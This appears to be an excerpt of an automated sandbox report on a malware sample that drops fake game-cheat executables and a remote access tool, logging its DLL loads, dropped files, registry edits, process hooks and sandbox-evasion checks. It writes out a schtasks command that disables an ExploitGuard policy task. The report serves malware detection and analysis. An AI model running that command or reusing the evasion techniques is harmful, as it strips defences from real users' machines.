                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: wKj1CBkbos.exeStatic file information: File size 13565952 > 1048576
                            Source: wKj1CBkbos.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcede00
                            Source: 52cheatand52rat.exe.0.drStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                            Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
                            Source: Lunch LaCheatV2.exe.3.drStatic PE information: section name: .vmp0
                            Source: Lunch LaCheatV2.exe.3.drStatic PE information: section name: .vmp1
                            Source: Lunch LaCheat.exe.6.drStatic PE information: section name: .vmp0
                            Source: Lunch LaCheat.exe.6.drStatic PE information: section name: .vmp1
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeCode function: 2_2_00007FFD342B00BD pushad ; iretd 2_2_00007FFD342B00C1

                            Persistence and Installation Behavior

                            barindex
                            Uses cmd line tools excessively to alter registry or file data
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeFile created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeFile created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeFile created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeFile created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 1EF0005 value: E9 2B BA 45 75 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 7734BA30 value: E9 DA 45 BA 8A Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 1F00008 value: E9 8B 8E 49 75 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 77398E90 value: E9 80 71 B6 8A Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 1F10005 value: E9 8B 4D A2 74 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 76934D90 value: E9 7A B2 5D 8B Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 38E0005 value: E9 EB EB 06 73 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 7694EBF0 value: E9 1A 14 F9 8C Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 38F0005 value: E9 8B 8A 03 72 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 75928A90 value: E9 7A 75 FC 8D Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 3900005 value: E9 2B 02 05 72 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 75950230 value: E9 DA FD FA 8D Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 3910005 value: E9 8B 2F A7 73 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 77382F90 value: E9 7A D0 58 8C Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 3920007 value: E9 EB DF A9 73 Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 4788 base: 773BDFF0 value: E9 1E 20 56 8C Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: Lunch LaCheatV2.exe, 00000006.00000002.2263995910.0000000000408000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: Q|SBIEDLL.DLL
                            Tries to detect virtualization through RDTSC time measurements
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: 10396D7 second address: 10396EF instructions: 0x00000000 rdtsc 0x00000002 bsf dx, bx 0x00000006 test esp, 7F476D6Bh 0x0000000c xor cl, FFFFFFA9h 0x0000000f not dh 0x00000011 xor bl, cl 0x00000013 btc eax, FFFFFFACh 0x00000017 push ebp 0x00000018 rdtsc
